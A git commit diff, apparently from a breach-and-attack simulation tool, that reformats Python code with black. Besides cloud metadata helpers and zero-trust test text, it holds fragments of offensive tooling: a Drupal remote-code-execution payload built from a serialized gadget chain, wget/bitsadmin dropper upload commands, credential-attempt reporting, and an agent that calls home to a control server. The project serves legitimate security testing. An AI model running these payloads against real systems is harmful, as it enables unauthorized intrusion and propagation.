Fixed screwed up formatting with black

Authored by VakarisZ on 2021-04-07 11:13:49 +03:00; committed by Mike Salvatore
parent 03bcfc97af
commit 3149dcc8ec
329 changed files with 5482 additions and 5603 deletions
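
The hunks below are purely mechanical: black inserts a space after the colon in dict literals and slice expressions, and re-joins wrapped arguments that fit within the line limit. A minimal sketch of reproducing one such rewrite is shown here; the line length of 100 is an assumption about the project's configuration, and the snippet is illustrative rather than part of the commit:

# Sketch only: reproduce the kind of rewrite shown in the hunks below.
# Assumes the `black` package is installed; line_length=100 is a guess at the project's setting.
import black

src = 'telemetry = {"monkey_guid":GUID, "telem_category":telem_category, "data":json_data}\n'
formatted = black.format_str(src, mode=black.FileMode(line_length=100))
print(formatted)
# -> telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}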

View File

@@ -48,8 +48,7 @@ class AwsInstance(CloudInstance):
        try:
            self.account_id = self._extract_account_id(
                requests.get(
                    AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
                ).text
            )
        except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:

View File

@@ -20,10 +20,10 @@ logger = logging.getLogger(__name__)
def filter_instance_data_from_aws_response(response):
    return [
        {
            "instance_id": x[INSTANCE_ID_KEY],
            "name": x[COMPUTER_NAME_KEY],
            "os": x[PLATFORM_TYPE_KEY].lower(),
            "ip_address": x[IP_ADDRESS_KEY],
        }
        for x in response[INSTANCE_INFORMATION_LIST_KEY]
    ]

View File

@@ -38,8 +38,8 @@ EXPECTED_ACCOUNT_ID = "123456789012"
def get_test_aws_instance(
    text={"instance_id": None, "region": None, "account_id": None},
    exception={"instance_id": None, "region": None, "account_id": None},
):
    with requests_mock.Mocker() as m:
        # request made to get instance_id
@@ -67,9 +67,9 @@ def get_test_aws_instance(
def good_data_mock_instance():
    return get_test_aws_instance(
        text={
            "instance_id": INSTANCE_ID_RESPONSE,
            "region": AVAILABILITY_ZONE_RESPONSE,
            "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
        }
    )
@@ -99,9 +99,9 @@ def test_get_account_id_good_data(good_data_mock_instance):
def bad_region_data_mock_instance():
    return get_test_aws_instance(
        text={
            "instance_id": INSTANCE_ID_RESPONSE,
            "region": "in-a-different-world",
            "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
        }
    )
@@ -131,9 +131,9 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
def bad_account_id_data_mock_instance():
    return get_test_aws_instance(
        text={
            "instance_id": INSTANCE_ID_RESPONSE,
            "region": AVAILABILITY_ZONE_RESPONSE,
            "account_id": "who-am-i",
        }
    )
@@ -163,11 +163,11 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan
def bad_instance_id_request_mock_instance(instance_id_exception):
    return get_test_aws_instance(
        text={
            "instance_id": None,
            "region": AVAILABILITY_ZONE_RESPONSE,
            "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
        },
        exception={"instance_id": instance_id_exception, "region": None, "account_id": None},
    )
@@ -201,11 +201,11 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins
def bad_region_request_mock_instance(region_exception):
    return get_test_aws_instance(
        text={
            "instance_id": INSTANCE_ID_RESPONSE,
            "region": None,
            "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
        },
        exception={"instance_id": None, "region": region_exception, "account_id": None},
    )
@@ -239,11 +239,11 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
def bad_account_id_request_mock_instance(account_id_exception):
    return get_test_aws_instance(
        text={
            "instance_id": INSTANCE_ID_RESPONSE,
            "region": AVAILABILITY_ZONE_RESPONSE,
            "account_id": None,
        },
        exception={"instance_id": None, "region": None, "account_id": account_id_exception},
    )

View File

@@ -54,5 +54,5 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
        )
        self.assertEqual(
            filter_instance_data_from_aws_response(json.loads(json_response_full)),
            [{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}],
        )

View File

@@ -9,8 +9,7 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = (
    "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
)
logger = logging.getLogger(__name__)
@@ -41,7 +40,7 @@ class AzureInstance(CloudInstance):
        try:
            response = requests.get(
                AZURE_METADATA_SERVICE_URL,
                headers={"Metadata": "true"},
                timeout=SHORT_REQUEST_TIMEOUT,
            )

View File

@@ -7,96 +7,96 @@ from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureI
from common.cloud.environment_names import Environment
GOOD_DATA = {
    "compute": {
        "azEnvironment": "AZUREPUBLICCLOUD",
        "isHostCompatibilityLayerVm": "true",
        "licenseType": "Windows_Client",
        "location": "westus",
        "name": "examplevmname",
        "offer": "Windows",
        "osProfile": {
            "adminUsername": "admin",
            "computerName": "examplevmname",
            "disablePasswordAuthentication": "true",
        },
        "osType": "linux",
        "placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a",
        "plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"},
        "platformFaultDomain": "36",
        "platformUpdateDomain": "42",
        "publicKeys": [
            {"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"},
            {"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"},
        ],
        "publisher": "RDFE-Test-Microsoft-Windows-Server-Group",
        "resourceGroupName": "macikgo-test-may-23",
        "resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
        "-may-23/"
        "providers/Microsoft.Compute/virtualMachines/examplevmname",
        "securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"},
        "sku": "Windows-Server-2012-R2-Datacenter",
        "storageProfile": {
            "dataDisks": [
                {
                    "caching": "None",
                    "createOption": "Empty",
                    "diskSizeGB": "1024",
                    "image": {"uri": ""},
                    "lun": "0",
                    "managedDisk": {
                        "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
                        "resourceGroups/macikgo-test-may-23/providers/"
                        "Microsoft.Compute/disks/exampledatadiskname",
                        "storageAccountType": "Standard_LRS",
                    },
                    "name": "exampledatadiskname",
                    "vhd": {"uri": ""},
                    "writeAcceleratorEnabled": "false",
                }
            ],
            "imageReference": {
                "id": "",
                "offer": "UbuntuServer",
                "publisher": "Canonical",
                "sku": "16.04.0-LTS",
                "version": "latest",
            },
            "osDisk": {
                "caching": "ReadWrite",
                "createOption": "FromImage",
                "diskSizeGB": "30",
                "diffDiskSettings": {"option": "Local"},
                "encryptionSettings": {"enabled": "false"},
                "image": {"uri": ""},
                "managedDisk": {
                    "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
                    "resourceGroups/macikgo-test-may-23/providers/"
                    "Microsoft.Compute/disks/exampleosdiskname",
                    "storageAccountType": "Standard_LRS",
                },
                "name": "exampleosdiskname",
                "osType": "Linux",
                "vhd": {"uri": ""},
                "writeAcceleratorEnabled": "false",
            },
        },
        "subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
        "tags": "baz:bash;foo:bar",
        "version": "15.05.22",
        "vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6",
        "vmScaleSetName": "crpteste9vflji9",
        "vmSize": "Standard_A3",
        "zone": "",
    },
    "network": {
        "interface": [
            {
                "ipv4": {
                    "ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}],
                    "subnet": [{"address": "10.144.133.128", "prefix": "26"}],
                },
                "ipv6": {"ipAddress": []},
                "macAddress": "0011AAFFBB22",
            }
        ]
    },
@@ -113,7 +113,7 @@ javascript\">\nvar pageName = '/';\ntop.location.replace(pageName);\n</script>\n
    "</body>\n</html>\n"
)
BAD_DATA_JSON = {"": ""}
def get_test_azure_instance(url, **kwargs):

View File

@@ -39,7 +39,7 @@ class AwsCmdRunner(CmdRunner):
        doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
        command_res = self.ssm.send_command(
            DocumentName=doc_name,
            Parameters={"commands": [command_line]},
            InstanceIds=[self.instance_id],
        )
        return command_res["Command"]["CommandId"]

View File

@@ -81,24 +81,24 @@ PRINCIPLE_DISASTER_RECOVERY = "data_backup"
PRINCIPLE_SECURE_AUTHENTICATION = "secure_authentication"
PRINCIPLE_MONITORING_AND_LOGGING = "monitoring_and_logging"
PRINCIPLES = {
    PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your "
    ""
    ""
    "network.",
    PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: "Analyze network traffic for malicious activity.",
    PRINCIPLE_USER_BEHAVIOUR: "Adopt security user behavior analytics.",
    PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint "
    "security solutions.",
    PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.",
    PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as "
    "possible.",
    PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources "
    "should be MAC (Mandatory "
    "Access Control) only.",
    PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster "
    "recovery scenarios.",
    PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
    PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.",
}
POSSIBLE_STATUSES_KEY = "possible_statuses"
@@ -107,206 +107,206 @@ PRINCIPLE_KEY = "principle_key"
FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = {
    TEST_SEGMENTATION: {
        TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can "
        "communicate with from the machine it's "
        "running on, that belong to different network segments.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and"
            " logs.",
            STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, "
            "check firewall logs.",
        },
        PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
        PILLARS_KEY: [NETWORKS],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
    },
    TEST_MALICIOUS_ACTIVITY_TIMELINE: {
        TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking "
        "actions, like scanning and attempting "
        "exploitation.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and "
            "alerts."
        },
        PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
        PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
    },
    TEST_ENDPOINT_SECURITY_EXISTS: {
        TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an "
        "endpoint security software.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and "
            "activate anti-virus "
            "software on endpoints.",
            STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to "
            "see if Monkey was a "
            "security concern. ",
        },
        PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
        PILLARS_KEY: [DEVICES],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
    TEST_MACHINE_EXPLOITED: {
        TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to "
        "breach them and propagate in the network.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
            "activity recognized and see "
            "which endpoints were compromised.",
            STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
        },
        PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
        PILLARS_KEY: [DEVICES],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
    },
    TEST_SCHEDULED_EXECUTION: {
        TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in "
            "User-Behavior security "
            "software.",
            STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
        },
        PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
        PILLARS_KEY: [PEOPLE, NETWORKS],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
    },
    TEST_DATA_ENDPOINT_ELASTIC: {
        TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to "
        "ElasticSearch instances.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by "
            "encrypting it in in-transit.",
            STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such "
            "instances, look for alerts "
            "that indicate attempts to access them. ",
        },
        PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
        PILLARS_KEY: [DATA],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
    TEST_DATA_ENDPOINT_HTTP: {
        TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP " "servers.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in"
            " in-transit.",
            STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, "
            "look for alerts that indicate "
            "attempts to access them. ",
        },
        PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
        PILLARS_KEY: [DATA],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
    TEST_DATA_ENDPOINT_POSTGRESQL: {
        TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
            " it in in-transit.",
            STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, "
            "look for alerts that "
            "indicate attempts to access them. ",
        },
        PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
        PILLARS_KEY: [DATA],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
    TEST_TUNNELING: {
        TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies "
            "are too permissive - "
            "restrict them. "
        },
        PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
        PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
    },
    TEST_COMMUNICATE_AS_NEW_USER: {
        TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate "
        "with the internet from it.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies "
            "are too permissive - "
            "restrict them to MAC only.",
            STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
        },
        PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
        PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
    TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
        TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
            STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
        },
        PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
        PILLARS_KEY: [NETWORKS],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
    TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
        TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing " "unencrypted data.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
            STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
        },
        PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
        PILLARS_KEY: [DATA],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
    TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
        TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not "
        "protected against data loss.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
            STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
        },
        PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
        PILLARS_KEY: [DATA],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
    TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
        TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' " "authentication.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
            STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
        },
        PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
        PILLARS_KEY: [PEOPLE, WORKLOADS],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
    TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
        TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access " "policies.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "ScoutSuite found permissive user access policies.",
            STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
        },
        PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
        PILLARS_KEY: [PEOPLE, WORKLOADS],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
    TEST_SCOUTSUITE_LOGGING: {
        TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "ScoutSuite found logging issues.",
            STATUS_PASSED: "ScoutSuite found no logging issues.",
        },
        PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
        PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
    TEST_SCOUTSUITE_SERVICE_SECURITY: {
        TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
        FINDING_EXPLANATION_BY_STATUS_KEY: {
            STATUS_FAILED: "ScoutSuite found service security issues.",
            STATUS_PASSED: "ScoutSuite found no service security issues.",
        },
        PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
        PILLARS_KEY: [DEVICES, NETWORKS],
        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
    },
}
@@ -315,13 +315,13 @@ EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
PILLARS_TO_TESTS = {
    DATA: [],
    PEOPLE: [],
    NETWORKS: [],
    DEVICES: [],
    WORKLOADS: [],
    VISIBILITY_ANALYTICS: [],
    AUTOMATION_ORCHESTRATION: [],
}
PRINCIPLES_TO_TESTS = {}

View File

@@ -14,29 +14,29 @@ class ScanStatus(Enum):
class UsageEnum(Enum):
    SMB = {
        ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
        ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service "
        "via MS-SCMR.",
    }
    MIMIKATZ = {
        ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
        ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
    }
    MIMIKATZ_WINAPI = {
        ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
        ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
    }
    DROPPER = {
        ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
    }
    SINGLETON_WINAPI = {
        ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's "
        "process.",
        ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
        " for monkey process wasn't successful.",
    }
    DROPPER_WINAPI = {
        ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
    }

View File

@@ -18,8 +18,7 @@ def get_version(build=BUILD):
def print_version():
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
    )
    args = parser.parse_args()
    print(get_version(args.build))

View File

@@ -52,13 +52,13 @@ class ControlClient(object):
        has_internet_access = check_internet_access(WormConfiguration.internet_services)
        monkey = {
            "guid": GUID,
            "hostname": hostname,
            "ip_addresses": local_ips(),
            "description": " ".join(platform.uname()),
            "internet_access": has_internet_access,
            "config": WormConfiguration.as_dict(),
            "parent": parent,
        }
        if ControlClient.proxies:
@@ -67,7 +67,7 @@ class ControlClient(object):
        requests.post(
            "https://%s/api/monkey" % (WormConfiguration.current_server,),  # noqa: DUO123
            data=json.dumps(monkey),
            headers={"content-type": "application/json"},
            verify=False,
            proxies=ControlClient.proxies,
            timeout=20,
@@ -134,15 +134,14 @@ class ControlClient(object):
                "https://%s/api/monkey/%s"
                % (WormConfiguration.current_server, GUID),  # noqa: DUO123
                data=json.dumps(monkey),
                headers={"content-type": "application/json"},
                verify=False,
                proxies=ControlClient.proxies,
                timeout=MEDIUM_REQUEST_TIMEOUT,
            )
        except Exception as exc:
            LOG.warning(
                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
            )
            return {}
@@ -155,20 +154,19 @@ class ControlClient(object):
            )
            return
        try:
            telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
            requests.post(
                "https://%s/api/telemetry" % (WormConfiguration.current_server,),
                # noqa: DUO123
                data=json.dumps(telemetry),
                headers={"content-type": "application/json"},
                verify=False,
                proxies=ControlClient.proxies,
                timeout=MEDIUM_REQUEST_TIMEOUT,
            )
        except Exception as exc:
            LOG.warning(
                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
            )
    @staticmethod
@@ -176,19 +174,18 @@ class ControlClient(object):
        if not WormConfiguration.current_server:
            return
        try:
            telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
            requests.post(
                "https://%s/api/log" % (WormConfiguration.current_server,),  # noqa: DUO123
                data=json.dumps(telemetry),
                headers={"content-type": "application/json"},
                verify=False,
                proxies=ControlClient.proxies,
                timeout=MEDIUM_REQUEST_TIMEOUT,
            )
        except Exception as exc:
            LOG.warning(
                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
            )
    @staticmethod
@@ -206,8 +203,7 @@ class ControlClient(object):
        except Exception as exc:
            LOG.warning(
                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
            )
            return
@@ -238,16 +234,15 @@ class ControlClient(object):
            requests.patch(
                "https://%s/api/monkey/%s"
                % (WormConfiguration.current_server, GUID),  # noqa: DUO123
                data=json.dumps({"config_error": True}),
                headers={"content-type": "application/json"},
                verify=False,
                proxies=ControlClient.proxies,
                timeout=MEDIUM_REQUEST_TIMEOUT,
            )
        except Exception as exc:
            LOG.warning(
                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
            )
            return {}
@@ -287,7 +282,7 @@ class ControlClient(object):
        else:
            arch = "x86_64"
        return {"os": {"type": os, "machine": arch}}
    @staticmethod
    def download_monkey_exe_by_filename(filename, size):
@@ -316,8 +311,7 @@ class ControlClient(object):
        except Exception as exc:
            LOG.warning(
                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
            )
    @staticmethod
@@ -333,7 +327,7 @@ class ControlClient(object):
                "https://%s/api/monkey/download"
                % (WormConfiguration.current_server,),  # noqa: DUO123
                data=json.dumps(host_dict),
                headers={"content-type": "application/json"},
                verify=False,
                proxies=ControlClient.proxies,
                timeout=LONG_REQUEST_TIMEOUT,
@@ -350,8 +344,7 @@ class ControlClient(object):
        except Exception as exc:
            LOG.warning(
                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
            )
            return None, None
@@ -435,7 +428,7 @@ class ControlClient(object):
    def report_start_on_island():
        requests.post(
            f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
            data=json.dumps({"started_on_island": True}),
            verify=False,
            timeout=MEDIUM_REQUEST_TIMEOUT,
        )

View File

@@ -53,8 +53,8 @@ class MonkeyDrops(object):
        self.opts, _ = arg_parser.parse_known_args(args)
        self._config = {
            "source_path": os.path.abspath(sys.argv[0]),
            "destination_path": self.opts.location,
        }
    def initialize(self):
@@ -147,7 +147,7 @@ class MonkeyDrops(object):
        if OperatingSystem.Windows == SystemInfoCollector.get_os():
            monkey_cmdline = (
                MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]}
                + monkey_options
            )
        else:
@@ -156,12 +156,12 @@ class MonkeyDrops(object):
            # and the inner one which actually
            # runs the monkey
            inner_monkey_cmdline = (
                MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]}
                + monkey_options
            )
            monkey_cmdline = GENERAL_CMDLINE_LINUX % {
                "monkey_directory": dest_path[0 : dest_path.rfind("/")],
                "monkey_commandline": inner_monkey_cmdline,
            }
        monkey_process = subprocess.Popen(
@@ -189,8 +189,7 @@ class MonkeyDrops(object):
        try:
            if (
                (self._config["source_path"].lower() != self._config["destination_path"].lower())
                and os.path.exists(self._config["source_path"])
                and WormConfiguration.dropper_try_move_first
            ):

View File

@@ -49,12 +49,12 @@ class HostExploiter(Plugin):
    def __init__(self, host):
        self._config = WormConfiguration
        self.exploit_info = {
            "display_name": self._EXPLOITED_SERVICE,
            "started": "",
            "finished": "",
            "vulnerable_urls": [],
            "vulnerable_ports": [],
            "executed_cmds": [],
        }
        self.exploit_attempts = []
        self.host = host
@@ -76,12 +76,12 @@ class HostExploiter(Plugin):
    def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""):
        self.exploit_attempts.append(
            {
                "result": result,
                "user": user,
                "password": password,
                "lm_hash": lm_hash,
                "ntlm_hash": ntlm_hash,
                "ssh_key": ssh_key,
            }
        )
@@ -120,4 +120,4 @@ class HostExploiter(Plugin):
        :param cmd: String of executed command. e.g. 'echo Example'
        """
        powershell = True if "powershell" in cmd.lower() else False
        self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})

View File

@@ -85,7 +85,7 @@ class DrupalExploiter(WebRCE):
        response = requests.get(
            f"{url}?_format=hal_json",  # noqa: DUO123
            json=payload,
            headers={"Content-Type": "application/hal+json"},
            verify=False,
            timeout=MEDIUM_REQUEST_TIMEOUT,
        )
@@ -105,7 +105,7 @@ class DrupalExploiter(WebRCE):
        r = requests.get(
            f"{url}?_format=hal_json",  # noqa: DUO123
            json=payload,
            headers={"Content-Type": "application/hal+json"},
            verify=False,
            timeout=LONG_REQUEST_TIMEOUT,
        )
@@ -171,20 +171,20 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
def build_exploitability_check_payload(url):
    payload = {
        "_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
        "type": {"target_id": "article"},
        "title": {"value": "My Article"},
        "body": {"value": ""},
    }
    return payload
def build_cmd_execution_payload(base, cmd):
    payload = {
        "link": [
            {
                "value": "link",
                "options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
                'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
                'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
                '{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
@@ -195,6 +195,6 @@ def build_cmd_execution_payload(base, cmd):
                "".replace("|size|", str(len(cmd))).replace("|command|", cmd),
            }
        ],
        "_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
    }
    return payload

View File

@@ -53,8 +53,8 @@ class ElasticGroovyExploiter(WebRCE):
        exploit_config["dropper"] = True
        exploit_config["url_extensions"] = ["_search?pretty"]
        exploit_config["upload_commands"] = {
            "linux": WGET_HTTP_UPLOAD,
            "windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
        }
        return exploit_config

View File

